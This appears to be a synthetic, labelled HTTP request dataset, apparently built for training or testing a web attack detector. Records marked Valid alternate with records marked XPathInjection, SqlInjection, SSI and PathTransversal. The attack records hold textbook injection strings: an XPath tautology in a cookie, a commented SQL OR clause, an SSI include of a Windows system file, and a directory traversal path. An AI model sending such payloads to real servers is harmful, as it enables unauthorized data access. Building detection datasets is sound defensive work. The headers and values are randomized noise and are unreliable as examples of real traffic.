Via: HTTP/3.5 www.eeebekT.html, HTTP/6.7 www.nras.htm, eOdei/1.4 178.216.62.39
Transfer-Encoding: apea
Upgrade: toe/3.4, erkdin/7.1, 5elTNe/2.3, n0otGk/3.5
Warning: 043 205.130.181.187:01570 "r9oi9t" "Thu, 28 Jul 05 10:14:18 GMT"
X-Forwarded-For: 111.79.187.206
X-Serial-Number: 65212341307
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 1652
Start - Id: 2521
class: Valid
GET /eixO8oy63mE.png?eo=e18HIPQa4%406t&9d=yi&divttI_-=68390680&sRs8retPpstia=06&mro6wi2wxsnd=dui2niiari2&r6d1e2itsSc=toi4a-Hy&snrcam=sEIUD&oz8idl=o+u%25i&SHRYh=6047203&lhfm=282922&arouos1gwiZtl=%24nzewntetghd&ot4srotret1rO=%7C1fCc%3Dtg1TEn&tPr=htpassutfxseaNElsoo5&vYysqB=866051&Ufhuin=n2woostniFa%25i%25udrop HTTP/1.0
Host: 2.154.138.17
Connection: iiliaefu
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, deflate;q=0.0, identity;q=0.8, compress;q=0.9, identity;q=0.5
Accept-Language: *;q=0.2
Cache-Control: max-age=53
Client-ip: 171.191.7.222
Cookie: EZ@FXstdinpassthru@C=X2e;Agsock_streamIwindow.openVdW2var=mee$feaRlobjectnreq;WfTj=mug;ardbNtt=7093
Cookie2: $Version="794"
Date: Sun, 28 Oct 07 24:00:52 UTC
ETag: "CelH7v9rhJypvTbLpia"
Expect: 5erAaA
From: lifcswz@aveP.cz
If-Modified-Since: Fri, 26 May 06 06:31:51 UTC
If-Unmodified-Since: Fri, 06 Apr 07 13:39:29 UTC
If-Match: *
If-None-Match: "m@cEg4WjUvS@T@jeO__"
If-Range: Tue, 16 Mar 10 13:25:22 UTC
Max-Forwards: 12
MIME-Version: 4.0
Pragma: 6l=cr
Proxy-Authorization: Basic dGl2dEVleHI6Zm5tZ2g=
Authorization: NTLM c2xhYW50ZWV5ZzdneDFlY2F4c3J5bHNzZXN1Y2hib0V1ZWllYWJlbGw=
Range: 32-6,-041504
Referer: /em7cwee/hjcdm.mspx
TE: trailers,gzip
Trailer: Date
User-Agent: uriEtrd/4.8
UA-CPU: MIPS
UA-Disp: 284,569,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 831x8702
Via: peooEd/7.7 www.a55asdxc.htm, FTP/0.6 www.erzeR6.tiff
Transfer-Encoding: identity
Upgrade: ia4er/9.3, i4os/2.0, 2ctlrr/2.8, ssda5h/3.4, t6p/1.9
Warning: 328 www.o0iot.shtml "okhortmuaesoti" 
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 347745233258688600
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 2521
Start - Id: 50077
class: XPathInjection
PUT /acf/lk_1EWl/t92SYIlibkPAl/bQ/ceee26l/y8inrechhthsoru2a1/itlu6zeIirs0/veleeAkabesBoaoEek5/ne@.t0Ks7xgX/qnaccess_logjnUW7@ROSON/pF.cH23Opb.pl? HTTP/1.1
Content-Length: 147
Content-Language: oteoh6ol,tTsmhr
Content-Encoding: compress
Content-Location: /mpyooio/kizret/eCkn/ejwo/ahatsv.png
Content-MD5: RU1hbmc4ZWl1dWxnZUhIcw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 20 Sep 06 20:23:07 CET
Last-Modified: Wed, 12 Apr 06 14:04:29 UTC
Host: 129.114.19.11:80
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: windows-1257;q=0.0
Accept-Encoding: deflate;q=0.1
Accept-Language: Oytrevh-r2;q=0.7
Cache-Control: no-store
Client-ip: 176.167.93.178
Cookie: TNsOletcN8k=o;IOmPiXystyle=ec'     or 1<   onnn/z/nt/child::text()[position()=34]  or  'gH3'    = ';owoxhmatnEnMbd=etgdT;C_XIQN6iT=leiwme
Cookie2: $Version="8"
Date: Mon, 03 Aug 09 20:02:38 UTC
ETag: W/"YvBDBo2za1toxnc75kU"
If-Modified-Since: Sat, 14 Jun 08 09:50:44 GMT
If-Unmodified-Since: Tue, 01 Sep 09 09:18:23 CET
If-Match: *
If-None-Match: "_ZXpXPJgeVyRCxjFSP"
If-Range: Fri, 29 Oct 04 04:35:06 CET
Max-Forwards: 23
MIME-Version: 1.8
Pragma: rrzxOgma=aesoRyhk
Authorization: Basic Z3Z4dXdtZTp1dGx1TTE=
Referer: /dLnvr/8hamxt.cfm
TE: gzip;q=0.8,trailers,trailers
User-Agent: Mozilla/7.4 (X11; U; SunOS sun4u 2.6; ER-yT; rv:3.7.6) Gecko/93616156
UA-Color: color8
Via: 7.2 www.ew7eRMr.css:9
Transfer-Encoding: deflate
Warning: 280 231.16.57.114 "heey2eoaoen" "Tue, 20 Oct 09 23:24:02 UTC"
X-Forwarded-For: 111.165.36.41
----: ---------------------------------------------

xw65oUsgE=nlylT&SRts=sZd490Zn-&rtIpo= t&etmut=l&6swe6e1n=Nnhoerajtsoohrpcdd&Ad=osi&nh=saehAguaoaeyietwR&RarsehoYTssm=254&zzjv1JzarQ=32364&DEOQL=167

End - Id: 50077
Start - Id: 31678
class: Valid
GET /4mR5m.hdY/B-c0L/3nd/shPnlaglxttyA3y2teNn.tiff?avu=elitsnLtrmgsystemor&vaaaoaeebwha=o&tmm9e3=th&leHnetcat1ud=GNEt3elkko+%5CaeS7sl&g8h=2&xLscriptwGH=95925169&uusrmrys=7wheigzm&stI=tm HTTP/1.0
Host: www.rTdjdiusUE.uk:67
Connection: close
Accept: text/plain, image/png;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=55160
Client-ip: 40.233.136.128
Cookie: frSnn9dei= qe;ansKltthw8=9853781;uep=l txml;o06yox9shnOtLt=Mothsrue;vie9g3=exOkmQBpxRLH
Cookie2: $Version="9"
Date: Fri, 19 Sep 08 23:50:44 GMT
ETag: W/"yj3Ke_Th9ugnelKLp"
Expect: 100-continue
From: ohtet@rtesnrmn.st
If-Modified-Since: Tue, 30 Mar 04 18:47:18 UTC
If-Unmodified-Since: Thu, 21 Jun 07 17:58:05 GMT
If-Match: *
If-None-Match: *
If-Range: "Tf0LtsHScji.WE5J"
Max-Forwards: 4
MIME-Version: 0.1
Pragma: j=e9olzL
Proxy-Authorization: Basic b2R0ZWlkcTp6ZWloVXI=
Authorization: NTLM ZWN0c3RlYjhhcW53YzZzaGRvcnJtclRkZW10b2hvb3d5MXRjbldh
Range: -175363,44975-899427
Referer: /tpineos/woooie/erEGCtE1/varaeaEe.mdb
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/6.2 (compatible; MSIE 1.0; Open BSD i386; mtv8t; unvasneneo; tLlC)
UA-CPU: PowerPC
UA-Disp: 276,661,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 997x935
Via: 1.9 238.238.114.214
Transfer-Encoding: identity
Upgrade: btunt/5.4, cYrmc9/5.3, hcAhe/8.8
Warning: 418 153.55.150.41 "iD12a5epIiilHeo" 
X-Forwarded-For: 13.228.134.190
X-Serial-Number: 049800080
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31678
Start - Id: 41584
class: SqlInjection
GET /binKoFbgsound/rfv6asBZ7WYM@tcHgEEV/FM0atelnet5/n7F/0thtl7unaIa/b8sp/rm6eeAUmi8h/rnrye7aenpu/hltrn.7EY0cbFEAHw9ms/Uuelrtaey/wfQposition--oIth09a/tovuFsrn.sh?nthyeeSssrm8=%27++++%2F**%2F++OR++++%2F**%2F++%27ctn1rofna%27+++%3E++++%27S HTTP/1.0
Host: 101.69.156.163
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: TEatfe-lelzhbd;q=0.0, g-Yb;q=0.1, nasnNgh-wht
Cache-Control: min-fresh=7
Client-ip: 38.173.11.46
Cookie: noffnh5oAj0kscW=:suAf1euaccept3 zJkb;beQJGiframej=309764
Cookie2: $Version="8"
Date: Wed, 29 Aug 07 22:05:01 UTC
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
If-Unmodified-Since: Sun, 11 Apr 04 21:54:00 GMT
If-Match: "f-qYG_DDORq5mdaMr57"
If-None-Match: "kYtlOjwsAccz48Os"
If-Range: *
Max-Forwards: 5715
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: iIehv ce1Orilo=oaerTe0
Authorization: NTLM aW91c3Nqa1d6dGhpRE5zaWhhaTJlcm0xaXl1dHdlMmh5eno2dG8=
Range: 572-0
Referer: /icejt/d6at/jtlhNtz.conf
TE: trailers,trailers,gzip
Trailer: If-Range
User-Agent: uQTryolq5s0xe8nE
UA-CPU: StrongARM
UA-Disp: 989,4955,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1236x139
Via: 7.4 www.neqto.jpeg, 0.1 www.Breaee.js, 0.4 71.80.45.0
Transfer-Encoding: compress
Upgrade: rtu9j/1.3, ayt1st/7.1, iEp/9.8
Warning: 480 www.mfahnai.css "oldac4" "Mon, 15 Jun 09 01:00:23 UTC"
X-Forwarded-For: 166.15.230.232
X-Serial-Number: 124390233
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41584
Start - Id: 12945
class: Valid
GET /oiatwo8etoamt/y2-kx9CEb5Of/xnrtnaofoejihejcob/hothhnaadtkkdaNglinn/mqU8I6.child1o4/8q1fUrHSPW.aspx?gbody_r0VrEnFAH=ln%5Cl+efcilikes8sf&nJtEwtc8a=rwtueOw+pr&razab7hthEos=v7&lesdltds5y2tml=ntkbtritcyean&shhzb=nZUw-gO&ap3C3mYhttpsXBEn=etQDx8Id9&mBMcmd=oteh0ao&ny1skuEiepEolt=80504732&mqngo1vo2h=rcpaA%3E&rdo=27500693&nDehtiee99fbtr=gTvRt6D5C-r&oysMnsrtocrnuts=a HTTP/1.1
Host: www.tqlkxnmex.fr
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: ut78-ahorT;q=0.5, oruHI-ekrheiy;q=0.1
Cache-Control: jpaEto=goip6lF
Client-ip: 97.163.108.195
Cookie: errcJomo62tS=vWvWq;soraAdunss=4854;alafrOgwyq=otdO4ohono;xeaaea2en=80;aa=ce4 NePx4includee<
Cookie2: $Version="83"
Date: Wed, 31 May 06 15:08:56 GMT
ETag: W/"i1yF.eyf4zILE.k"
Expect: ihGd9=n13TTc
From: I3hnmy@0fhsF.net
If-Modified-Since: Tue, 15 Jul 08 16:19:35 GMT
If-Unmodified-Since: Sat, 28 Aug 04 11:55:23 GMT
If-Match: "fuG7tJANn4WAD@i"
If-None-Match: *
If-Range: "rujXFBhR5V3PDlQRQ"
Max-Forwards: 81
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM ZG5lYW1sb25pb0s4cnJUdW5vVG5UdGlvc2V0dGFOdEZ6
Authorization: NTLM ZVRvaXNpcGo4ZXR2YXJuZERyaWRpdHFkYXB1YXJhYXRob25FV3BzbGRubWc=
Range: -742
Referer: /wdcei/eemgthmy/1u3eus/3hsiaEn.mdb
TE: deflate;q=0.2,chunked,chunked
Trailer: If-Range
User-Agent: dtaeexbarditicuO
UA-CPU: Sparc
UA-Disp: 2455,8800,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 3851x1864
Via: terM/4.1 28.114.234.174, 0.2 www.N8hbrrs.htm
Transfer-Encoding: deflate
Upgrade: deie/0.6, rtumhr/9.8
Warning: 659 11.248.81.124 "abilo" 
X-Forwarded-For: 29.49.155.233
X-Serial-Number: 194126085
----: ----------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 12945
Start - Id: 23215
class: Valid
GET /crase/dmnuloi/fn78ltf/eiilnsh0pecnatArtrts/ditthTun/sny2mizorseDP/oiHEodcIp.exe?retotnr=beaornhLdhits&tnlterx=lroOabe8H&2tNrmroa=inwindow.open+%26senvm&eEiitilhrNnoas=uaiso%28thmv&ri2slsifhnocE=06105&draLadnrhPsbnz=deps&eyistf3wcetcau=2eanduer&3rc8runye1s=3489369462&nnnc4=0016&ndneaLAite9=992&nl8noj=dBnjcptDgs&ahSnqito=4009 HTTP/1.0
Host: 254.93.1.173
Connection: close
Accept: */*;q=0.4
Accept-Charset: iso-8859-8-i, koi8;q=0.3, hz-gb-2312, x-mac-cyrillic, cp-932;q=0.9
Accept-Encoding: deflate;q=0.4, identity;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 86.223.133.126
Cookie: KLGX=rn :nvarcfe;21ertdaa=5;l3=saez3tneczn;afe4ekhnp37qe=41;o3ltn=3
Cookie2: $Version="1"
Date: Tue, 08 Jun 04 07:25:14 UTC
ETag: W/"ett5X5q..RGOZQdld"
Expect: 100-continue
From: prra@pwbtk.it
If-Modified-Since: Thu, 15 Jun 06 07:50:25 GMT
If-Unmodified-Since: Sat, 28 Apr 07 04:16:06 GMT
If-Match: "XG.UHtUK6ayJalWz"
If-None-Match: "txvVKqtVe3buBVFD."
If-Range: Tue, 30 Jan 07 03:59:09 UTC
Max-Forwards: 14
MIME-Version: 0.1
Pragma: Ei=oeaenE
Proxy-Authorization: Digest realm
Authorization: Basic ZU9lY2c6ZG9lZQ==
Range: -30,07-2
Referer: http://oibirg.biz/ecuCecuv/5ortv0/9xgy2c2o.fgf
TE: deflate;q=0.6,trailers
Trailer: Via
User-Agent: Mozilla/9.2 (Windows; U; WinNT 7.3; om-de; rv:7.0.2) Gecko/98814227
UA-CPU: PowerPC
UA-Disp: 1015,816,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 973x7584
Via: HTTP/1.7 206.130.120.191:97517, 1.5 www.8ddcyeh.shtml, 0.4 www.earo.shtml
Transfer-Encoding: compress
Upgrade: ic7/9.0, xiebw/0.3, pdyeUH/1.9, 94kno/7.1, uMr/6.8
Warning: 866 www.iesEfey.jpg:21695 "zbyenndTms" "Fri, 26 Sep 08 08:03:01 UTC"
X-Forwarded-For: 175.124.77.138
X-Serial-Number: 9726059
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23215
Start - Id: 40453
class: SSI
GET /eeuLyrAde/0eimexTfdrrarazLaHp/i-6DSaur/pus/j3FacopyDFqAM0.insertfv/6IuIZEa/nnIre/knatnat/vonPdYOb-@heyMX-yZw.php4?1Cie4ovitina=%3C%21--++%23include+virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22+++--%3E HTTP/1.1
Host: www.C8e6o.be
Connection: delrmtiI
Accept: text/plain, audio/x-wav, audio/*;q=0.7
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 202.75.46.235
Cookie: br3bNee=o8z2-h_3traa;Hqz1jdc8=d@AQTeFgwXh;g.6script_n0eo=l11;Rhgw8=o$;rnoihslortuns=location]drti
Cookie2: $Version="535"
Date: Fri, 13 Oct 06 24:47:50 CET
ETag: "5Csw9nV98-3ZX2kjN6IA"
Expect: ener
If-Modified-Since: Sun, 25 Jul 04 15:10:31 GMT
If-Unmodified-Since: Fri, 06 Jun 08 19:15:22 UTC
If-Match: "f9SPJ2goPQwnhT4AK"
If-None-Match: *
If-Range: *
Max-Forwards: 093
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM UnJyd1JhdGRoY05tU25taHJnZUVkZWJjcHVqZHVhdGlzc2UxdGg=
Authorization: 976i M2hnh7r=rgau0st
Range: -485025,482150-
Referer: /5eetwrsc/eOtrsRmN.php
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/4.2 (Machintosh; U; PPC Mac OS X 0.6; bn-oe; rv:5.5.6) Gecko/53240452
UA-CPU: 68000
UA-Disp: 0939,1824,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 025x185
Via: FTP/2.0 48.53.180.231, 2.1 www.ptea.htm, 0.6 www.4rlnar.shtml
Transfer-Encoding: identity
Upgrade: 5tNn/1.3, eSn/8.3
Warning: 877 199.106.218.152:633 "aasim" "Thu, 01 Apr 10 13:11:21 GMT"
X-Forwarded-For: 231.125.197.76
X-Serial-Number: 9011770
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40453
Start - Id: 3120
class: Valid
GET /yikdewArzzkaS_LaC7Gq/wyGYBqf6O5MhWyglSXm/Eeut5catNe/Fftps@-7QO1nYu89.htm?dilCu=458&ndIs=lbi3&7GgkupdateF6AZ=w9ae%40K.ph&0cstenrlbNl=25016&VQ-kUlog=mbodyadmin+O&bjusnieer0s=eol1j%26des&FuuIb_1=7&jiowt6l6oo=0.MTZnI&ceeeild7Rs6d=t8arph&edugtrtr=+%3Bb&zr1mxGOe=698028&@6uUxterm=d5lm HTTP/1.0
Host: 101.204.234.143
Connection: sudrIj
Accept: */*
Accept-Charset: x-mac-chinesetrad;q=0.1, x-mac-arabic, windows-1258;q=0.0
Accept-Encoding: 
Accept-Language: brnbharn-enhuhc;q=0.5
Cache-Control: no-transform
Client-ip: 53.57.134.175
Cookie: caeor=/  ;os=nieaa0zte = tnit&n\;nk-3XoONfii=4648;ttlt=rteq8m1AtMrA
Cookie2: $Version="631"
Date: Mon, 05 Apr 04 13:09:40 GMT
ETag: W/"k1bDH-QRD6giy00AGJ0"
Expect: 100-continue
From: eead@01e8oq1.gov
If-Modified-Since: Wed, 25 May 05 11:16:01 GMT
If-Unmodified-Since: Fri, 09 Mar 07 05:44:17 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 841
MIME-Version: 9.9
Pragma: lntcia='asiEhm'
Proxy-Authorization: Basic ZHZnZDo3c2F3YXM=
Authorization: Basic cnNsem5waTp1eXNs
Range: -6106,0309-,1-
Referer: http://www.doosouio.ch/sZs44/amO7q.exe
TE: deflate;q=0.4,trailers,trailers
Trailer: Accept-Language
User-Agent: eo380 (ivPqLNfsdz; kqRGwBUL; 3jZc.he)
UA-CPU: PowerPC
UA-Disp: 345,165,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 5219x775
Via: FTP/1.9 www.mfHi.css, 2.2 www.ireamne.shtml, 3.0 177.63.7.182
Transfer-Encoding: compress
Upgrade: n4c/0.0, pOx/3.9
Warning: 446 www.fikne.html "nqbsbldmuEl1E71nq1" 
X-Forwarded-For: 54.64.220.207
X-Serial-Number: 1722875
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3120
Start - Id: 26194
class: Valid
GET /oautrnefis74a/86Vetcfmqdf9.mdb? HTTP/1.0
Host: www.rl9eiwTast.it
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 200.48.13.171
Cookie: NroAihctgtlesw=3078;ARn8la52t=8282368;nceDgxeosthnn=cctwoxhsi=4tih;anT7dsotsti1ir=da% ;LpositionCiUOechoQLq.8=55500217
Cookie2: $Version="79"
Date: Fri, 05 Jan 07 24:53:52 GMT
ETag: "JcbwuqTF96ZmBk@TmAG"
Expect: 100-continue
From: 3hydema@pttee.de
If-Modified-Since: Sat, 06 Aug 05 01:58:37 UTC
If-Unmodified-Since: Mon, 07 Sep 09 08:19:59 UTC
If-Match: "m.msVYfBu@ydaZKL."
If-None-Match: "YjO0R_CT1B2rMXNMni"
If-Range: *
Max-Forwards: 262
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic ZWljdW06aDdkSW8=
Authorization: NTLM aHdlcjlvb21obXFsYm9FaG55dEU3ZWNydGFhbGJlbjFleWQ=
Range: 863391-,79-36
Referer: http://cflsra.com/ofzwj1d/cmaamzgl/totnwar/erJc.bin
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/5.4 (X11; U; Solaris 3.7; lt-En; rv:4.8.1) Gecko/58142841
UA-CPU: MIPS
UA-Disp: 048,473,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0211x5802
Via: HTTP/7.8 53.70.124.38, 4.4 www.ageOa.jpg, FTP/0.2 179.12.71.150
Transfer-Encoding: compress
Upgrade: ehiiB/7.2, yq3zM6/2.7, cdle/0.9, toodwq/0.1
Warning: 072 www.cUEomj7n.html:46118 "aodn" "Sun, 21 Jun 09 18:25:54 CET"
X-Forwarded-For: 117.153.119.109
X-Serial-Number: 2106773576
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26194
Start - Id: 26113
class: Valid
GET /tGuqM@CiDvgJkULgND/3jsH/goiUWy.png?uteBrshUryuisr=trt2XSdAf0&ttg0tladt=Sbaatrumm0q HTTP/1.1
Host: 25.76.85.244
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, euc-jp, euc-tw
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-transform
Client-ip: 15.51.184.61
Cookie: 16logvlN=g8l;tdrecDecy4o3T=d43di
Cookie2: $Version="23"
Date: Fri, 09 Sep 05 04:15:47 CET
ETag: W/"leM058aFvFmPe0_B"
Expect: 100-continue
From: onjJtaeo@rtkFe9o2gi.st
If-Modified-Since: Wed, 13 Aug 08 19:50:41 GMT
If-Unmodified-Since: Tue, 08 May 07 12:07:02 UTC
If-Match: *
If-None-Match: "Vi_3H3Q5XHjiE0WJv.5Y"
If-Range: *
Max-Forwards: 770
MIME-Version: 5.1
Pragma: Rvrt=ed0s
Proxy-Authorization: NTLM MHJzZnN0ZWZlZWNxcHNpbnR1eXNoMW5udWhpVFRuN3hlaTg=
Authorization: hh3R zada=oeel
Range: 5570-,706880-3
Referer: /Euiut/t8am.png
TE: gzip
Trailer: If-Range
User-Agent: i7Eiobtni (9WyVAzoaN)
UA-CPU: Sparc
UA-Disp: 5226,2357,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 5001x5670
Via: HTTP/6.6 www.ruoaNu.html
Transfer-Encoding: gzip
Upgrade: ofesrr/6.5, wiTer/0.7
Warning: 803 211.131.116.100 "tisise5eslK" "Tue, 29 Dec 09 16:59:21 UTC"
X-Forwarded-For: 38.148.116.46
X-Serial-Number: 759149792604
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26113
Start - Id: 45868
class: PathTransversal
GET /uSBP5uhCcDR/ewutveunmdoOsotlKt/atneH1ra/iZ46echt6rmo/t0lseoh/tmp@MLg-KmRB-copy29/gwIWBwG1Rp@qIU3ZVnYE.mspx?8wIa5=6sHIry&blotse0k3hr=%3E&KcPf3TzcDzn=87009&27r.=sDli&9aitofm=02105&eytbaupete6eeek=4f%3B0a+tj0aa1waNot3&InELrEItM7=+b7%7Comeax6t%5C+n&Trufdykidn=1positione&vo=97824302&nriAyorwannth=3460&nsahepi7=%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fstname%2Fnatrndic%2Fin%2Fdentgeiein.cgi HTTP/1.0
Host: 31.56.203.125
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 36.115.35.231
Cookie: hy6eohSai=64010;un=970201;rhrlosQc4itbxo=lad9f\scriptaEapLiy;erfeneloihdgato=eet7d;enr5=lbs
Cookie2: $Version="9"
Date: Thu, 29 Oct 09 15:13:57 CET
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: lnkmyen@hfeiUitnt.com
If-Modified-Since: Wed, 03 Nov 04 05:21:07 UTC
If-Unmodified-Since: Sat, 10 Sep 05 08:06:17 UTC
If-Match: "R@K@4G3EOoGddWDJ"
If-None-Match: *
If-Range: Sun, 16 Jul 06 21:48:13 UTC
Max-Forwards: 1
MIME-Version: 5.3
Pragma: hulinc8='tas2c6e'
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: NTLM dWx5bk85bG9yaEZhaUhmaFR0d2VzOXR5MmdubHFzcjV6dA==
Range: 81947-,357703-
Referer: http://www.ideseaR9.be/rrtha.bin
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 1.7; mh-n1; rv:1.7.6) Gecko/03427690
UA-CPU: PowerPC
UA-Disp: 096,9977,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0549x672
Via: FTP/5.1 www.t4wqkngc.gif, 2.2 189.183.98.129, 2.9 67.15.176.169
Transfer-Encoding: Otetal
Upgrade: impc/6.7
Warning: 645 115.27.59.90:9013 "qanewiWttmahnnlyit1n" "Thu, 03 Mar 05 21:14:02 GMT"
X-Forwarded-For: 150.61.102.195
X-Serial-Number: 61308570883843
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45868
Start - Id: 31384
class: Valid
GET /mi-.Av_G.NlrjXFTp.y/tVNtxVTfPNI4p/rakinoslo9gmsmtt/rfBBtwPD3Kpu9lLjFrgN/e.JZGj3x0d1N_j/adbi85tgps5uCgTie/bSm45Ct6GGTLX/tf86oHSJ1.U.php?Mrnr=6224&egurn2E2a5ype=shqssnYepdeletebiowx&9segpeips=j3%40&ttiT=xL3Ewn606FbG&uqhdsd5e2=5&etEe9erm92elhoE=e+ui%24n&snlaninemw=Mo HTTP/1.0
Host: www.d6oauo.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: identity, gzip;q=0.3, gzip
Accept-Language: *
Cache-Control: no-store
Client-ip: 248.191.216.133
Cookie: connectboot.iniWY8scriptRvX=in u|iodhee&'as;Ea;hioastsaHfEhese=bLmFvotestwellax;sijeIrr=a3rme;0eutqmpeiraeirA=lmnfltsnxee
Cookie2: $Version="970"
Date: Fri, 27 Apr 07 20:49:22 CET
ETag: W/"qBvb8IB9g@7ld@Ek1"
Expect: ddos3
From: Tzeuatea@eoges.de
If-Modified-Since: Sun, 01 Aug 04 19:14:44 CET
If-Unmodified-Since: Tue, 15 Sep 09 06:42:28 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 18 May 04 24:54:59 UTC
Max-Forwards: 75
MIME-Version: 4.6
Pragma: wItlnfi=oedwlncj
Proxy-Authorization: NTLM cnRobWJNaGVoaXJQb25zczFGc25hM2VuYW9zc2RPbGVkb3NubHRpYVRkTm8=
Authorization: Basic ZWdoZWNBaDphaW5ucmplOQ==
Range: 214-,6423-,-75701
Referer: /iRcbeoy/hqonR/ryyoYx/hiaeoH4/rtj8re.jpeg
TE: gzip,deflate;q=0.1
Trailer: Pragma
User-Agent: eQJTw_dB_ http://www.r31edaha.ch
UA-CPU: Sparc
UA-Disp: 6015,3763,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2355x254
Via: lpm/6.3 209.147.56.23:1
Transfer-Encoding: identity
Upgrade: ruexiD/5.5
Warning: 398 226.241.76.108 "setlnsfmby7bt1eaniq" "Fri, 18 Aug 06 14:43:39 UTC"
X-Forwarded-For: 122.12.60.197
X-Serial-Number: 33047995554498
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31384
Start - Id: 24884
class: Valid
GET /ex8ps8lsdienh/h8dx-TUdEzBac7Y/EMdocumentaY/hynilbtn3eheseRr/6aifq-rp--nvkp/5V2ILKNe6/8dMisg/rorafre900tmet/et7mEt2I/irghSpaR/RzIfpZ/e71twIpetn.exe?9FhLHqxXk=sp%2FtietetHFti+Ascxprocessing-instructionn&spJRcJe=m9e0httpElmhttpfst&kirm=34794141&Iinnt=6&e6=oOcX5uA9qxd&XU6w4Y.lI7=mosPhbetween%5Ccn&4n=2246962&eltt=trduo9oeh HTTP/1.0
Host: 189.116.233.234
Connection: close
Accept: video/*;q=0.0, audio/*, text/xml
Accept-Charset: euc-jp;q=0.4, iso-8859-3;q=0.5, iso-2022-kr, cp-936
Accept-Encoding: *
Accept-Language: idee9-t0eE, l-yto90hhE;q=0.9, fie-f9led, si-enihac2
Cache-Control: only-if-cached
Client-ip: 53.224.112.84
Cookie: irut=oochtlaNoiAnr8l4;rcpVWfW_a=(elEn8httpgns$ihavingmatiLri;dffco4AcRxnZe=?[i-oeanco;olSorcwt=ag+a
Cookie2: $Version="717"
Date: Mon, 05 Dec 05 10:14:59 GMT
ETag: W/"ahnaoqFV9xRdesl"
Expect: 100-continue
From: Xn3Re@fshsaAh.de
If-Modified-Since: Wed, 09 May 07 06:08:55 UTC
If-Unmodified-Since: Thu, 01 Jan 09 18:29:53 UTC
If-Match: *
If-None-Match: "0d_i-3atYhQio38_Vwn"
If-Range: *
Max-Forwards: 2
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Vigo a1lc=hriaibi
Authorization: tiin ehcr8e=diae5T
Range: 2531-5,49-34
Referer: /hScAreit.cgi
TE: chunked
Trailer: Range
User-Agent: Mozilla/1.8 (compatible; 9a7hr; Open BSD i586; piuadehacx; se8attt)
UA-CPU: StrongARM
UA-Disp: 8792,070,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 0163x5496
Via: 3.5 114.26.88.123, 7.4 128.234.159.126, 0.0 61.154.97.73
Transfer-Encoding: compress
Upgrade: ased8c/7.2, xfope/7.9, hidk/5.6, ote/8.0
Warning: 414 www.Eaoi.htm "troze3ol71" "Tue, 13 May 08 15:22:03 CET"
X-Forwarded-For: 45.246.59.205
